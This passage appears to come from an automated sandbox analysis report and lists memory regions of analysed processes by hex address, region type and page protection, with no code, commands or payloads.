page read and write
|
||
|
4BB0000
|
heap
|
page readonly
|
||
|
207DC000
|
stack
|
page read and write
|
||
|
23D99694000
|
heap
|
page read and write
|
||
|
703D0000
|
unkown
|
page readonly
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
23D9980F000
|
heap
|
page read and write
|
||
|
20050000
|
direct allocation
|
page read and write
|
||
|
23D97ABE000
|
heap
|
page read and write
|
||
|
1C4E4A51000
|
trusted library allocation
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
20900000
|
direct allocation
|
page read and write
|
||
|
1C4FCF9C000
|
heap
|
page read and write
|
||
|
1C4E4670000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
1C4E495E000
|
heap
|
page read and write
|
||
|
1C4E4680000
|
heap
|
page read and write
|
||
|
7FFAAB840000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4E55FC000
|
trusted library allocation
|
page read and write
|
||
|
2FC7000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
23D97847000
|
heap
|
page read and write
|
||
|
23D9980F000
|
heap
|
page read and write
|
||
|
23D997F7000
|
heap
|
page read and write
|
||
|
23D99836000
|
heap
|
page read and write
|
||
|
3324000
|
trusted library allocation
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
20A51000
|
heap
|
page read and write
|
||
|
20AB1000
|
heap
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
7FFAAB810000
|
trusted library allocation
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
4F87000
|
heap
|
page read and write
|
||
|
23D997B6000
|
heap
|
page read and write
|
||
|
7FFAAB726000
|
trusted library allocation
|
page read and write
|
||
|
C3508FF000
|
stack
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
3275000
|
stack
|
page read and write
|
||
|
4FA3000
|
heap
|
page read and write
|
||
|
23D99845000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
3300000
|
trusted library section
|
page read and write
|
||
|
23D99813000
|
heap
|
page read and write
|
||
|
2E7C000
|
stack
|
page read and write
|
||
|
23D997B7000
|
heap
|
page read and write
|
||
|
23D997DB000
|
heap
|
page read and write
|
||
|
1C4E2C66000
|
heap
|
page read and write
|
||
|
8C80000
|
direct allocation
|
page read and write
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
E7E04FE000
|
stack
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
1C4E4675000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
49BE000
|
heap
|
page read and write
|
||
|
23D97970000
|
heap
|
page read and write
|
||
|
3177000
|
heap
|
page read and write
|
||
|
2C20000
|
heap
|
page readonly
|
||
|
20C1C000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
23D9783E000
|
heap
|
page read and write
|
||
|
8920000
|
heap
|
page read and write
|
||
|
23D99887000
|
heap
|
page read and write
|
||
|
2081D000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
23D97A90000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
C35087E000
|
stack
|
page read and write
|
||
|
8B3E000
|
stack
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
4FBF000
|
heap
|
page read and write
|
||
|
23D97881000
|
heap
|
page read and write
|
||
|
1C4E2BD0000
|
trusted library allocation
|
page read and write
|
||
|
23D997D8000
|
heap
|
page read and write
|
||
|
7838000
|
heap
|
page read and write
|
||
|
32F0000
|
trusted library section
|
page read and write
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
23D97847000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
7FFB0C4D0000
|
unkown
|
page readonly
|
||
|
23D997DB000
|
heap
|
page read and write
|
||
|
2B0E000
|
unkown
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
8630000
|
trusted library allocation
|
page read and write
|
||
|
85EE000
|
stack
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
4CBD000
|
stack
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
7FFAAB67D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2062F000
|
stack
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D996A1000
|
heap
|
page read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
2EB8000
|
stack
|
page read and write
|
||
|
2C8A000
|
heap
|
page read and write
|
||
|
23D977EC000
|
heap
|
page read and write
|
||
|
23D9979D000
|
heap
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
1C4E66C9000
|
trusted library allocation
|
page read and write
|
||
|
3352000
|
trusted library allocation
|
page read and write
|
||
|
2047F000
|
stack
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
1C4E5011000
|
trusted library allocation
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
7FFAAB970000
|
trusted library allocation
|
page read and write
|
||
|
23D9783C000
|
heap
|
page read and write
|
||
|
23D997FD000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
7FFAAB672000
|
trusted library allocation
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
23D97814000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
7938000
|
trusted library allocation
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
7FFB0C4F2000
|
unkown
|
page readonly
|
||
|
33C0000
|
heap
|
page readonly
|
||
|
7FFAAB857000
|
trusted library allocation
|
page read and write
|
||
|
496F000
|
stack
|
page read and write
|
||
|
20040000
|
direct allocation
|
page read and write
|
||
|
4FC7000
|
trusted library allocation
|
page read and write
|
||
|
32E0000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
7FFAAB8C0000
|
trusted library allocation
|
page read and write
|
||
|
23D97881000
|
heap
|
page read and write
|
||
|
23D9783E000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
C35198E000
|
stack
|
page read and write
|
||
|
23D97780000
|
heap
|
page read and write
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
79AE000
|
stack
|
page read and write
|
||
|
4CE5000
|
heap
|
page execute and read and write
|
||
|
301E000
|
stack
|
page read and write
|
||
|
23D97872000
|
heap
|
page read and write
|
||
|
4356000
|
remote allocation
|
page execute and read and write
|
||
|
23D997C8000
|
heap
|
page read and write
|
||
|
1C4E4921000
|
heap
|
page read and write
|
||
|
23D97881000
|
heap
|
page read and write
|
||
|
1C4E2CFE000
|
heap
|
page read and write
|
||
|
1C4E4ECB000
|
trusted library allocation
|
page read and write
|
||
|
88FE000
|
stack
|
page read and write
|
||
|
49B7000
|
heap
|
page read and write
|
||
|
1C4E2C4E000
|
heap
|
page read and write
|
||
|
4BC8000
|
trusted library allocation
|
page read and write
|
||
|
21216000
|
unclassified section
|
page execute and read and write
|
||
|
2043E000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
23D9788D000
|
heap
|
page read and write
|
||
|
499E000
|
heap
|
page read and write
|
||
|
8CB0000
|
direct allocation
|
page read and write
|
||
|
4ECB000
|
trusted library allocation
|
page read and write
|
||
|
23D99887000
|
heap
|
page read and write
|
||
|
4EDE000
|
unkown
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
8B7C000
|
stack
|
page read and write
|
||
|
23D977D0000
|
heap
|
page read and write
|
||
|
23D97860000
|
heap
|
page read and write
|
||
|
7FFAAB9B0000
|
trusted library allocation
|
page read and write
|
||
|
20CAB000
|
heap
|
page read and write
|
||
|
7F260000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAB9C0000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4A40000
|
heap
|
page execute and read and write
|
||
|
23D996A1000
|
heap
|
page read and write
|
||
|
703D1000
|
unkown
|
page execute read
|
||
|
4990000
|
heap
|
page read and write
|
||
|
1C4E4500000
|
trusted library allocation
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
8944000
|
heap
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
23D977E0000
|
heap
|
page read and write
|
||
|
1C4E50A8000
|
trusted library allocation
|
page read and write
|
||
|
4E81000
|
heap
|
page read and write
|
||
|
2053D000
|
stack
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
trusted library allocation
|
page read and write
|
||
|
4F8A000
|
heap
|
page read and write
|
||
|
3339000
|
trusted library allocation
|
page read and write
|
||
|
78AA000
|
heap
|
page read and write
|
||
|
7FFB1E872000
|
unkown
|
page readonly
|
||
|
23D99839000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
1C4E2BE0000
|
heap
|
page readonly
|
||
|
1C4E66BB000
|
trusted library allocation
|
page read and write
|
||
|
20710000
|
remote allocation
|
page read and write
|
||
|
887C000
|
stack
|
page read and write
|
||
|
2121C000
|
unclassified section
|
page execute and read and write
|
||
|
7FFAAB852000
|
trusted library allocation
|
page read and write
|
||
|
501D000
|
heap
|
page read and write
|
||
|
4F83000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D998E0000
|
heap
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
7FFAAB9A0000
|
trusted library allocation
|
page read and write
|
||
|
1C4F4A60000
|
trusted library allocation
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
205EE000
|
stack
|
page read and write
|
||
|
C350D3C000
|
stack
|
page read and write
|
||
|
509A000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
2FD4000
|
heap
|
page read and write
|
||
|
7FFAAB940000
|
trusted library allocation
|
page read and write
|
||
|
7310000
|
direct allocation
|
page read and write
|
||
|
23D997DB000
|
heap
|
page read and write
|
||
|
1C4FCFD3000
|
heap
|
page read and write
|
||
|
897E000
|
heap
|
page read and write
|
||
|
342C000
|
heap
|
page read and write
|
||
|
75BD000
|
stack
|
page read and write
|
||
|
1C4FD0BF000
|
heap
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
1FFF0000
|
direct allocation
|
page read and write
|
||
|
743D000
|
stack
|
page read and write
|
||
|
8CC0000
|
direct allocation
|
page read and write
|
||
|
C351A8D000
|
stack
|
page read and write
|
||
|
23D97AB0000
|
heap
|
page read and write
|
||
|
209B1000
|
heap
|
page read and write
|
||
|
4F9F000
|
heap
|
page read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
7FFAAB8A0000
|
trusted library allocation
|
page read and write
|
||
|
203E0000
|
heap
|
page read and write
|
||
|
499D000
|
heap
|
page read and write
|
||
|
23D97ABE000
|
heap
|
page read and write
|
||
|
5014000
|
heap
|
page read and write
|
||
|
890E000
|
heap
|
page read and write
|
||
|
2B3E000
|
heap
|
page read and write
|
||
|
5066000
|
heap
|
page read and write
|
||
|
23D97770000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2FC9000
|
heap
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
7DF432BA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
23D99691000
|
heap
|
page read and write
|
||
|
506F000
|
heap
|
page read and write
|
||
|
7FFAAB890000
|
trusted library allocation
|
page read and write
|
||
|
1C4E4820000
|
heap
|
page read and write
|
||
|
23D998E1000
|
heap
|
page read and write
|
||
|
8CA0000
|
direct allocation
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
27B0000
|
heap
|
page read and write
|
||
|
2089F000
|
stack
|
page read and write
|
||
|
2F10000
|
trusted library allocation
|
page read and write
|
||
|
4C20000
|
trusted library allocation
|
page execute and read and write
|
||
|
4995000
|
heap
|
page read and write
|
||
|
8600000
|
heap
|
page read and write
|
||
|
1C4E68BC000
|
trusted library allocation
|
page read and write
|
||
|
3323000
|
trusted library allocation
|
page execute and read and write
|
||
|
21199000
|
unclassified section
|
page execute and read and write
|
||
|
23D99813000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
23D99859000
|
heap
|
page read and write
|
||
|
4F8A000
|
heap
|
page read and write
|
||
|
5230000
|
heap
|
page read and write
|
||
|
49B5000
|
heap
|
page read and write
|
||
|
23D97860000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
2066E000
|
stack
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
2729000
|
stack
|
page read and write
|
||
|
C3509FF000
|
stack
|
page read and write
|
||
|
23D997AB000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
23D99831000
|
heap
|
page read and write
|
||
|
2FD8000
|
heap
|
page read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page read and write
|
||
|
1FFD0000
|
direct allocation
|
page read and write
|
||
|
4E71000
|
trusted library allocation
|
page read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
23D97865000
|
heap
|
page read and write
|
||
|
20010000
|
direct allocation
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
23D9969C000
|
heap
|
page read and write
|
||
|
23D99890000
|
heap
|
page read and write
|
||
|
23D99834000
|
heap
|
page read and write
|
||
|
C350A7E000
|
stack
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
49A5000
|
heap
|
page read and write
|
||
|
4CE0000
|
heap
|
page execute and read and write
|
||
|
5082000
|
heap
|
page read and write
|
||
|
7FFB1E875000
|
unkown
|
page readonly
|
||
|
1C4E2B30000
|
heap
|
page read and write
|
||
|
7FFAAB790000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E80000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
49AA000
|
heap
|
page read and write
|
||
|
4FDF000
|
stack
|
page read and write
|
||
|
23D998B5000
|
heap
|
page read and write
|
||
|
23D99887000
|
heap
|
page read and write
|
||
|
23D997FD000
|
heap
|
page read and write
|
||
|
2F0E000
|
stack
|
page read and write
|
||
|
23D997B1000
|
heap
|
page read and write
|
||
|
C351A0E000
|
stack
|
page read and write
|
||
|
5061000
|
heap
|
page read and write
|
||
|
7FFB0C4D1000
|
unkown
|
page execute read
|
||
|
3126000
|
heap
|
page read and write
|
||
|
78FC000
|
heap
|
page read and write
|
||
|
2DBE000
|
unkown
|
page read and write
|
||
|
499D000
|
heap
|
page read and write
|
||
|
7FFB0C4F5000
|
unkown
|
page readonly
|
||
|
23D9788D000
|
heap
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
1C4E55CA000
|
trusted library allocation
|
page read and write
|
||
|
8BEE000
|
stack
|
page read and write
|
||
|
8CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D97ABA000
|
heap
|
page read and write
|
||
|
342C000
|
heap
|
page read and write
|
||
|
23D99933000
|
heap
|
page read and write
|
||
|
3567000
|
heap
|
page read and write
|
||
|
23D99851000
|
heap
|
page read and write
|
||
|
23D97862000
|
heap
|
page read and write
|
||
|
7300000
|
direct allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
23D99841000
|
heap
|
page read and write
|
||
|
23D997D5000
|
heap
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
1C4E4650000
|
heap
|
page execute and read and write
|
||
|
9360000
|
direct allocation
|
page execute and read and write
|
||
|
23D996A1000
|
heap
|
page read and write
|
||
|
4FA0000
|
heap
|
page read and write
|
||
|
20D40000
|
heap
|
page read and write
|
||
|
865B000
|
trusted library allocation
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
23D97AB8000
|
heap
|
page read and write
|
||
|
2B3E000
|
heap
|
page read and write
|
||
|
7FFB0C4E6000
|
unkown
|
page readonly
|
||
|
E7E02F9000
|
stack
|
page read and write
|
||
|
703E6000
|
unkown
|
page readonly
|
||
|
4E90000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
C350C39000
|
stack
|
page read and write
|
||
|
1C4FCDB0000
|
heap
|
page read and write
|
||
|
23D997FD000
|
heap
|
page read and write
|
||
|
20CAB000
|
heap
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
1C4FD03A000
|
heap
|
page read and write
|
||
|
23D996B8000
|
heap
|
page read and write
|
||
|
1C4F4A51000
|
trusted library allocation
|
page read and write
|
||
|
6018000
|
trusted library allocation
|
page read and write
|
||
|
4FB5000
|
heap
|
page read and write
|
||
|
5095000
|
heap
|
page read and write
|
||
|
4995000
|
heap
|
page read and write
|
||
|
23D9982F000
|
heap
|
page read and write
|
||
|
E7E07FF000
|
stack
|
page read and write
|
||
|
7FFAAB855000
|
trusted library allocation
|
page read and write
|
||
|
20A52000
|
heap
|
page read and write
|
||
|
23D97822000
|
heap
|
page read and write
|
||
|
23D997F7000
|
heap
|
page read and write
|
||
|
23D977CF000
|
heap
|
page read and write
|
||
|
2085E000
|
stack
|
page read and write
|
||
|
299F000
|
stack
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
20D41000
|
heap
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
23D99791000
|
heap
|
page read and write
|
||
|
7FFB0C4F0000
|
unkown
|
page read and write
|
||
|
1C4E4C76000
|
trusted library allocation
|
page read and write
|
||
|
5072000
|
heap
|
page read and write
|
||
|
1C4E2C0B000
|
heap
|
page read and write
|
||
|
1C4FCF80000
|
heap
|
page execute and read and write
|
||
|
7B9C000
|
stack
|
page read and write
|
||
|
4F85000
|
heap
|
page read and write
|
||
|
7FFAAB910000
|
trusted library allocation
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
4C70000
|
heap
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB756000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D97881000
|
heap
|
page read and write
|
||
|
23D9784B000
|
heap
|
page read and write
|
||
|
29A2000
|
stack
|
page read and write
|
||
|
2074E000
|
stack
|
page read and write
|
||
|
23D9983D000
|
heap
|
page read and write
|
||
|
509E000
|
heap
|
page read and write
|
||
|
23D9781D000
|
heap
|
page read and write
|
||
|
1C4E2C54000
|
heap
|
page read and write
|
||
|
20CB4000
|
heap
|
page read and write
|
||
|
23D97861000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
8C2E000
|
stack
|
page read and write
|
||
|
3370000
|
trusted library allocation
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
4F8E000
|
heap
|
page read and write
|
||
|
23D977CA000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
20A28000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
7FFAAB8D0000
|
trusted library allocation
|
page read and write
|
||
|
4B41000
|
heap
|
page read and write
|
||
|
208D0000
|
unclassified section
|
page execute and read and write
|
||
|
23D99791000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
209B0000
|
heap
|
page read and write
|
||
|
21240000
|
heap
|
page read and write
|
||
|
4FAA000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
4999000
|
heap
|
page read and write
|
||
|
E7E09FD000
|
stack
|
page read and write
|
||
|
1C4E4850000
|
heap
|
page read and write
|
||
|
499F000
|
heap
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
1C4E48D4000
|
heap
|
page read and write
|
||
|
1C4E66A5000
|
trusted library allocation
|
page read and write
|
||
|
1C4E2C99000
|
heap
|
page read and write
|
||
|
316D000
|
heap
|
page read and write
|
||
|
23D997D7000
|
heap
|
page read and write
|
||
|
23D997C8000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
3310000
|
trusted library allocation
|
page read and write
|
||
|
C350B77000
|
stack
|
page read and write
|
||
|
C350CB8000
|
stack
|
page read and write
|
||
|
23D997EF000
|
heap
|
page read and write
|
||
|
23D9996B000
|
heap
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
23D977C9000
|
heap
|
page read and write
|
||
|
1C4E2C00000
|
heap
|
page read and write
|
||
|
23D9980F000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
4C30000
|
trusted library allocation
|
page read and write
|
||
|
34AE000
|
unkown
|
page read and write
|
||
|
72BB000
|
stack
|
page read and write
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
23D99840000
|
heap
|
page read and write
|
||
|
206AF000
|
stack
|
page read and write
|
||
|
1C4FCF87000
|
heap
|
page execute and read and write
|
||
|
86B0000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
334A000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D97867000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
1C4FCFA8000
|
heap
|
page read and write
|
||
|
23D9990E000
|
heap
|
page read and write
|
||
|
1C4E2C52000
|
heap
|
page read and write
|
||
|
2DAF000
|
stack
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
23D99960000
|
heap
|
page read and write
|
||
|
23D9784B000
|
heap
|
page read and write
|
||
|
7FFAAB9E0000
|
trusted library allocation
|
page read and write
|
||
|
2C8B000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D97870000
|
heap
|
page read and write
|
||
|
1C4FD0A5000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
33CA000
|
heap
|
page read and write
|
||
|
E7E03FE000
|
stack
|
page read and write
|
||
|
26EC000
|
stack
|
page read and write
|
||
|
23D97A40000
|
remote allocation
|
page read and write
|
||
|
7FFAAB72C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
2D6D000
|
stack
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
1C4E2B10000
|
heap
|
page read and write
|
||
|
71EE000
|
stack
|
page read and write
|
||
|
23D9983F000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
6890000
|
direct allocation
|
page read and write
|
||
|
23D99691000
|
heap
|
page read and write
|
||
|
7FFB1E851000
|
unkown
|
page execute read
|
||
|
1C4E4530000
|
trusted library allocation
|
page read and write
|
||
|
1C4E48B9000
|
heap
|
page read and write
|
||
|
4F90000
|
direct allocation
|
page read and write
|
||
|
505B000
|
heap
|
page read and write
|
||
|
49AA000
|
heap
|
page read and write
|
||
|
4C78000
|
heap
|
page read and write
|
||
|
1C4FD090000
|
heap
|
page read and write
|
||
|
4708000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
27A0000
|
heap
|
page readonly
|
||
|
7742000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
8948000
|
heap
|
page read and write
|
||
|
23D99891000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
3330000
|
trusted library allocation
|
page read and write
|
||
|
354A000
|
heap
|
page read and write
|
||
|
49D3000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
20BA3000
|
heap
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
5020000
|
heap
|
page read and write
|
||
|
4E95000
|
heap
|
page read and write
|
||
|
4E2E000
|
stack
|
page read and write
|
||
|
23D997F7000
|
heap
|
page read and write
|
||
|
506F000
|
heap
|
page read and write
|
||
|
20C1B000
|
heap
|
page read and write
|
||
|
1C4E2C8F000
|
heap
|
page read and write
|
||
|
49A1000
|
heap
|
page read and write
|
||
|
4F8A000
|
heap
|
page read and write
|
||
|
E7E0DFB000
|
stack
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D997DB000
|
heap
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
7A6D000
|
stack
|
page read and write
|
||
|
4260000
|
remote allocation
|
page execute and read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
204FE000
|
stack
|
page read and write
|
||
|
73BA000
|
stack
|
page read and write
|
||
|
1C4E4860000
|
heap
|
page read and write
|
||
|
23D9783C000
|
heap
|
page read and write
|
||
|
23D996A1000
|
heap
|
page read and write
|
||
|
20060000
|
direct allocation
|
page read and write
|
||
|
1C4E493F000
|
heap
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
509E000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
4D6E000
|
stack
|
page read and write
|
||
|
7FFB1E850000
|
unkown
|
page readonly
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB9D0000
|
trusted library allocation
|
page read and write
|
||
|
21230000
|
heap
|
page read and write
|
||
|
20B29000
|
heap
|
page read and write
|
||
|
4DB3000
|
heap
|
page read and write
|
||
|
2BA4000
|
heap
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
20030000
|
direct allocation
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
747E000
|
stack
|
page read and write
|
||
|
4FAC000
|
heap
|
page read and write
|
||
|
4990000
|
heap
|
page read and write
|
||
|
4FA3000
|
heap
|
page read and write
|
||
|
727D000
|
stack
|
page read and write
|
||
|
6005000
|
trusted library allocation
|
page read and write
|
||
|
499D000
|
heap
|
page read and write
|
||
|
506C000
|
heap
|
page read and write
|
||
|
757E000
|
stack
|
page read and write
|
||
|
1C4E2B70000
|
heap
|
page read and write
|
||
|
C351B8B000
|
stack
|
page read and write
|
||
|
23D997F7000
|
heap
|
page read and write
|
||
|
30AC000
|
heap
|
page read and write
|
||
|
23D99824000
|
heap
|
page read and write
|
||
|
23D997AB000
|
heap
|
page read and write
|
||
|
7FFB1E866000
|
unkown
|
page readonly
|
||
|
2B3D000
|
heap
|
page read and write
|
||
|
49A0000
|
heap
|
page read and write
|
||
|
7FFAAB930000
|
trusted library allocation
|
page read and write
|
||
|
49A5000
|
heap
|
page read and write
|
||
|
4F9D000
|
heap
|
page read and write
|
||
|
C3504C3000
|
stack
|
page read and write
|
||
|
23D99839000
|
heap
|
page read and write
|
||
|
296C000
|
stack
|
page read and write
|
||
|
4FE6000
|
heap
|
page read and write
|
||
|
4E60000
|
heap
|
page execute and read and write
|
||
|
753E000
|
stack
|
page read and write
|
||
|
23D97A40000
|
remote allocation
|
page read and write
|
||
|
23D99794000
|
heap
|
page read and write
|
||
|
23D977A0000
|
heap
|
page read and write
|
||
|
332D000
|
trusted library allocation
|
page execute and read and write
|
||
|
23D99820000
|
heap
|
page read and write
|
||
|
1C4E66CD000
|
trusted library allocation
|
page read and write
|
||
|
4991000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
1C4E48FC000
|
heap
|
page read and write
|
||
|
C35054E000
|
stack
|
page read and write
|
||
|
23D97862000
|
heap
|
page read and write
|
||
|
49A6000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
8958000
|
heap
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
4F89000
|
heap
|
page read and write
|
||
|
7FFAAB8F0000
|
trusted library allocation
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
5009000
|
heap
|
page read and write
|
||
|
4B40000
|
heap
|
page read and write
|
||
|
49C6000
|
heap
|
page read and write
|
||
|
49A9000
|
heap
|
page read and write
|
||
|
23D99697000
|
heap
|
page read and write
|
||
|
1C4E2EE0000
|
heap
|
page read and write
|
||
|
1C4E640C000
|
trusted library allocation
|
page read and write
|
||
|
75C0000
|
heap
|
page read and write
|
||
|
2790000
|
heap
|
page read and write
|
||
|
